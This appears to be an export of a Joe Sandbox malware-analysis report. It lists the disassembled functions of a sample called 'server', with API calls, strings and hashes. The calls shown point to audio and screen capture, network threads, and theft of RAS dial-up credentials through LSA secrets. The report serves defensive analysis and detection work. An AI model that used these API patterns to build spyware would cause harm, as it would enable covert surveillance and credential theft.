Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle
String ID:
API String ID: 738052048-0
Opcode ID: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
Instruction ID: bddd40b6041f7b89adb1d7152d05c651aa16d4d0b1a7c0af783e3df771abeb65
Opcode Fuzzy Hash: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
Instruction Fuzzy Hash: E321427178035576F234AB658C47F466AD5EB94B60F310529F785BF2D0CAF4B8408A5C

Function 10003060 Relevance: 10.6, APIs: 7, Instructions: 68windowsynchronizationCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10003072
SetEvent.KERNEL32(?,?,00000000,00000000), ref: 100030A4
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000), ref: 100030AC
waveInAddBuffer.WINMM(?,000003C0,00000020,?,00000000,00000000), ref: 100030C6
TranslateMessage.USER32(?), ref: 100030DB
DispatchMessageA.USER32(?), ref: 100030E6
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100030F7

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
String ID:
API String ID: 3294988761-0
Opcode ID: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
Instruction ID: d3f2bca1204f73eed7e2b61ebc1a15db6f1c2b26f9a106d8012aa4ef57a1d5f5
Opcode Fuzzy Hash: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
Instruction Fuzzy Hash: 6411AF71204351ABF320DF64DC88F67B7E9EB88760F004A2DFA0197290E7B5E908CB61

Function 10006CD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006D1F
CloseHandle.KERNEL32(00000000), ref: 10006D28
CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006D39
CloseHandle.KERNEL32(00000000), ref: 10006D3C
CreateThread.KERNEL32(00000000,00000000,10006AD0,00000000,00000000,00000000), ref: 10006D74

Strings

gfff, xrefs: 10006D42

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle
String ID: gfff
API String ID: 738052048-1553575800
Opcode ID: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
Instruction ID: 2020a1e7590e07279854810b9ce9ec764bac815170356a4596bb53d82c307b61
Opcode Fuzzy Hash: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
Instruction Fuzzy Hash: C711EC72B4031527F228D6299C46F1666D6EBD4760F25412AF745FB2D4C5F4BC408649

Function 1000F1A0 Relevance: 10.6, APIs: 7, Instructions: 66synchronizationCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1DA
InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1E2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F0
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F8
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F204
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F20A
DestroyCursor.USER32(?), ref: 1000F234

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
String ID:
API String ID: 2236516186-0
Opcode ID: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
Instruction ID: 0f553e4c3eadbe8d6fbd977fb2ead2f207a6b34009dca0ff4597f70e2537c953
Opcode Fuzzy Hash: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
Instruction Fuzzy Hash: A2215BB5200755ABE324DF59CC80B66F3A9FB89720F110B1DE56283690C7B5B8058B90

Function 1000D390 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D3C5
GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D3D3
RtlDeleteCriticalSection.NTDLL(?), ref: 1000D40C
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D417

Strings

closesocket, xrefs: 1000D3CD
ws2_32.dll, xrefs: 1000D3B8

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Library$AddressCriticalDeleteFreeLoadProcSection
String ID: closesocket$ws2_32.dll
API String ID: 1041861973-181964208
Opcode ID: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
Instruction ID: 90d420deef0742d789c7d7b03315d7db99f4f8719d0783f2fb5b7f6c44804b8f
Opcode Fuzzy Hash: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
Instruction Fuzzy Hash: EB11A0755047859BE300DF28CC44B5AB7E8FF49761F400B2EF96AD3290D7B899048AA1

Function 10007C20 Relevance: 10.6, APIs: 7, Instructions: 52stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,00000000,100075E0,00000000), ref: 10007C31
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C3A
??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,100075E0,00000000), ref: 10007C41
??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C49
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,100075E0,00000000), ref: 10007C5F
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10007C72
??3@YAXPAX@Z.MSVCRT(00000000), ref: 10007C79

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@ByteCharMultiWidelstrlen$??3@
String ID:
API String ID: 1676418047-0
Opcode ID: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
Instruction ID: e6a01bf69eca8877366d52572196cd1e750499aaefb071a1afc55558adb3dbc2
Opcode Fuzzy Hash: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
Instruction Fuzzy Hash: F7F0C273A052793BF12066A65C89FAB3B5DDB92BB0F100226F614AA2C0D9946C1186B6

Function 10003E30 Relevance: 9.1, APIs: 6, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 10003740: RtlEnterCriticalSection.NTDLL(10002690), ref: 10003748
Part of subcall function 10003740: RtlLeaveCriticalSection.NTDLL(10002690), ref: 10003761

_ftol.MSVCRT ref: 10003E6F
??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,1000175F,?,00000118,?,?,?,?,?,?), ref: 10003EAE

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CriticalSection$??2@??3@EnterLeave_ftol
String ID:
API String ID: 2245774403-0
Opcode ID: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
Instruction ID: 4abf8248d303709f5cc18c5d73ebea0275a85850dc47ce3d48f28f5182355441
Opcode Fuzzy Hash: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
Instruction Fuzzy Hash: C34196797047045BE705EF249C42A7FB39DEBC4794F00492DFA0597286EE34B90D87A2

Function 10010240 Relevance: 9.1, APIs: 6, Instructions: 105windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,0000005C,00000000,00000000,00000060,00000000,1000FD4A,?,?,00000001), ref: 1001026B
GetDC.USER32(00000000), ref: 100102C6
CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 100102D3
GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100102E6
ReleaseDC.USER32(00000000,00000000), ref: 100102EF
DeleteObject.GDI32(00000000), ref: 100102F6

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@BitmapBitsCompatibleCreateDeleteObjectRelease
String ID:
API String ID: 1095915628-0
Opcode ID: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
Instruction ID: 78a216903de2e8302ceba6b2a70ee99028da7e5e411dfa4f1e5e99106784fed4
Opcode Fuzzy Hash: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
Instruction Fuzzy Hash: 9F31F5712057418FE324CF29CC84B5AFBE6FF85304F188A6DE5958F2A1E7B1A549CB50

Function 10011DC0 Relevance: 9.1, APIs: 6, Instructions: 100stringsleepmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT ref: 10006E9B
Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT(?), ref: 10006EAA

lstrlen.KERNEL32(?), ref: 10011E0B
LocalAlloc.KERNEL32(00000040,00000001), ref: 10011E28
lstrlen.KERNEL32(?), ref: 10011E68
Sleep.KERNEL32(00000001), ref: 10011EAD
LocalSize.KERNEL32(00000000), ref: 10011EB4
LocalFree.KERNEL32(00000000,00000000,00000000), ref: 10011EC6

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Local$??2@lstrlen$AllocFreeSizeSleep
String ID:
API String ID: 3002304083-0
Opcode ID: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
Instruction ID: 77e4d1ca07d08acbcddfd6096d60104819a82ef412391c00f2a2c794c29ddd91
Opcode Fuzzy Hash: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
Instruction Fuzzy Hash: D131AE756083428FD314CF58C884B5ABBE5FB89750F500A1CF99697350DB74ED45CB92

Function 100050A0 Relevance: 9.1, APIs: 6, Instructions: 86threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 100050A8
gethostbyname.WS2_32(?), ref: 100050B4
inet_ntoa.WS2_32(?), ref: 100050DE
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000514C
CloseHandle.KERNEL32(00000000), ref: 1000514F
CreateThread.KERNEL32(00000000,00000000,10004FF0,00000000,00000000,00000000), ref: 1000517B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID:
API String ID: 772126777-0
Opcode ID: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
Instruction ID: cfe0648d242c00018cb7dca233d2f890e554d2c8424b1bc925b856dd57eae328
Opcode Fuzzy Hash: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
Instruction Fuzzy Hash: 3C21E2327403155BE328DB389C85B6B77E2FB84760F65462DFA52A72D0CEF4AC048658

Function 10004220 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 10004228
gethostbyname.WS2_32(?), ref: 10004234
inet_ntoa.WS2_32(?), ref: 1000425E
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100042CC
CloseHandle.KERNEL32(00000000), ref: 100042CF
CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 100042F8

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID:
API String ID: 772126777-0
Opcode ID: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
Instruction ID: bd1dde3535a19e8c7e55d02713a8ca2fab0bdaef4a4b0867c8bad2423498b820
Opcode Fuzzy Hash: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
Instruction Fuzzy Hash: 2821C7727403155BE328DB349C45B2A76E2FBC4760F65461DFA56A72D0CEB4EC048618

Function 10004C80 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000002), ref: 10004C88
gethostbyname.WS2_32(00000002), ref: 10004C94
inet_ntoa.WS2_32(?), ref: 10004CBE
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004D2C
CloseHandle.KERNEL32(00000000), ref: 10004D2F
CreateThread.KERNEL32(00000000,00000000,10004BC0,00000000,00000000,00000000), ref: 10004D58

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID:
API String ID: 772126777-0
Opcode ID: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
Instruction ID: 85862d7f0f71f0c49f886932ab5ba76a0be675f07226ac381a57201f8fc0328c
Opcode Fuzzy Hash: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
Instruction Fuzzy Hash: D021C7727407155BE328DB349C85B1A76E2FBC4760F65462EFA56A72D0CFB4EC048618

Function 10004F00 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 10004F08
gethostbyname.WS2_32(?), ref: 10004F14
inet_ntoa.WS2_32(?), ref: 10004F3E
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004FAC
CloseHandle.KERNEL32(00000000), ref: 10004FAF
CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 10004FD8

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID:
API String ID: 772126777-0
Opcode ID: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
Instruction ID: 074d757184539b64c9d175ae26cd748b0207da95c97c991421b52f25c974b03f
Opcode Fuzzy Hash: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
Instruction Fuzzy Hash: FB2106723043155BE328DB389C85B2A76E2FBC4760F66462DFA52A72D0CEF4EC04C618

Function 10002C30 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C48
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C51
??2@YAPAXI@Z.MSVCRT(000003E8), ref: 10002C78
??2@YAPAXI@Z.MSVCRT(00000020,000003E8), ref: 10002C82
??2@YAPAXI@Z.MSVCRT(000003E8,00000020,000003E8), ref: 10002C8D
??2@YAPAXI@Z.MSVCRT(00000020,000003E8,00000020,000003E8), ref: 10002C97

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@$CreateEvent
String ID:
API String ID: 747899935-0
Opcode ID: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
Instruction ID: a50fb07bf8c1123475231c099c298c4878f8277ca68681ab5e841357f648eb1a
Opcode Fuzzy Hash: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
Instruction Fuzzy Hash: 04215EB0900B449FD324CF6AC884557FBF8FF48348750892EE1898BB11E7B6E845CB54

Function 00402DD4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00402DF3
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00402E28
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E88

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 00402E62
__MSVCRT_HEAP_SELECT, xrefs: 00402E23

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
Instruction ID: 6320224d0c2d352184b776b6ceda42ea704a1604693acbb24f6c53f50b478bf9
Opcode Fuzzy Hash: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
Instruction Fuzzy Hash: D231577188025869EB30D630EE49BDB37689B02708F2400FBD245F52C2E3BD8E998B59

Function 100073D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1000743C

Part of subcall function 100071B0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2

LsaFreeMemory.ADVAPI32(?), ref: 1000746A
LsaFreeMemory.ADVAPI32(?), ref: 10007494

Part of subcall function 10007240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,00000000), ref: 10007279

Strings

RasDialParams!%s#0, xrefs: 100073FF
L$_RasDefaultCredentials#0, xrefs: 100073F6

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: FreeMemory$ByteCharMultiOpenPolicyWidewsprintf
String ID: L$_RasDefaultCredentials#0$RasDialParams!%s#0
